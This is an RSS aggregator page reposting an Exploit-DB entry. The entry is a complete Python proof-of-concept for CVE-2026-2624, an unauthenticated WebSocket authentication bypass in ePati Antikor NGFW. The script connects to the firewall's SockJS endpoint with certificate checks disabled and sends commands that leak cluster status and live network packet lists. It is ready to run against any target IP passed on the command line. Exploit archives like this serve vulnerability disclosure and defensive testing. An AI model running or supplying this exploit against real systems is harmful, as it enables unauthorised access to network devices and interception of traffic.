惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Google Online Security Blog
Google Online Security Blog
S
Security @ Cisco Blogs
Recent Commits to openclaw:main
Recent Commits to openclaw:main
人人都是产品经理
人人都是产品经理
The Hacker News
The Hacker News
W
WeLiveSecurity
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
The Cloudflare Blog
博客园 - 司徒正美
雷峰网
雷峰网
L
LINUX DO - 最新话题
博客园 - 叶小钗
云风的 BLOG
云风的 BLOG
The Last Watchdog
The Last Watchdog
V2EX - 技术
V2EX - 技术
S
Security Affairs
有赞技术团队
有赞技术团队
月光博客
月光博客
T
Threatpost
T
Tor Project blog
O
OpenAI News
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
V
V2EX
Know Your Adversary
Know Your Adversary
Project Zero
Project Zero
博客园 - 三生石上(FineUI控件)
D
Docker
AWS News Blog
AWS News Blog
AI
AI
P
Proofpoint News Feed
K
Kaspersky official blog
H
Hackread – Cybersecurity News, Data Breaches, AI and More
D
Darknet – Hacking Tools, Hacker News & Cyber Security
www.infosecurity-magazine.com
www.infosecurity-magazine.com
S
Securelist
F
Fortinet All Blogs
F
Full Disclosure
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
量子位
Hacker News - Newest:
Hacker News - Newest: "LLM"
CTFtime.org: upcoming CTF events
CTFtime.org: upcoming CTF events
P
Palo Alto Networks Blog
Cyberwarzone
Cyberwarzone
Cisco Talos Blog
Cisco Talos Blog
美团技术团队
N
News | PayPal Newsroom
T
The Blog of Author Tim Ferriss
MyScale Blog
MyScale Blog

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
sadik · 2026-05-14 · via Exploit-DB.com RSS Feed
# Exploit Title: ePati Antikor NGFW 2.0.1301 -  Authentication Bypass 
# Date: 2026-04-13
# Exploit Author: [SADIK ERTÜRK]
# Vendor Homepage: https://www.epati.com.tr/
# Software Link: https://www.epati.com.tr/antikor-ngfw/
# Version: v.2.0.1298 - v.2.0.1301
# Tested on: Linux / Antikor OS
# CVE: CVE-2026-2624

import websocket
import json
import ssl
import sys
import argparse
import random
import string
import time

def banner():
    print("-" * 65)
    print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit")
    print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]")
    print("-" * 65)

def generate_random_id(length=8):
    """Generates a random session ID for the SockJS connection."""
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

def exploit(target_ip, target_port):
    # Generating random server and session IDs for SockJS
    server_id = random.randint(100, 999)
    session_id = generate_random_id()
    
    ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket"
    print(f"[*] Target WebSocket URL created: {ws_url}")
    print("[*] Connecting to the target... (Ignoring SSL certificate warnings)")

    try:
        # Bypassing Self-Signed SSL certificate verifications
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
        ws.connect(ws_url)
        print("[+] Connection Successful! (Authentication bypassed)\n")
        
        # Payload 1: Listening to Cluster and System Status
        payload_1 = json.dumps(["{\"istekId\":\"req_init_01\",\"komut\":\"rapor-dinle\",\"parametreler\":[\"cluster-durum\"]}"])
        print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...")
        ws.send(payload_1)

        # Wait for the response from the server
        time.sleep(1) 
        response_1 = ws.recv()
        
        if response_1:
            print("[+] SUCCESSFUL! Sensitive system data successfully leaked:")
            print(f"> {response_1}\n")
        
        # Payload 2: Listening to Network Packets
        payload_2 = json.dumps(["{\"istekId\":\"req_101\",\"komut\":\"paket-liste-dinle\",\"parametreler\":[]}"])
        print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...")
        ws.send(payload_2)
        
        time.sleep(1)
        response_2 = ws.recv()
        
        if response_2:
            print("[+] Network packet data captured:")
            print(f"> {response_2}\n")

        print("[*] Exploitation complete. Closing connection.")
        ws.close()

    except websocket.WebSocketException as e:
        print(f"[-] WebSocket Error: {e}")
        print("[-] The target might be patched (v.2.0.1302+) or the port is closed.")
        sys.exit(1)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")
        sys.exit(1)

if __name__ == "__main__":
    banner()
    
    # Argument parsing
    parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC")
    parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)")
    parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)")
    
    args = parser.parse_args()
    
    exploit(args.target, args.port)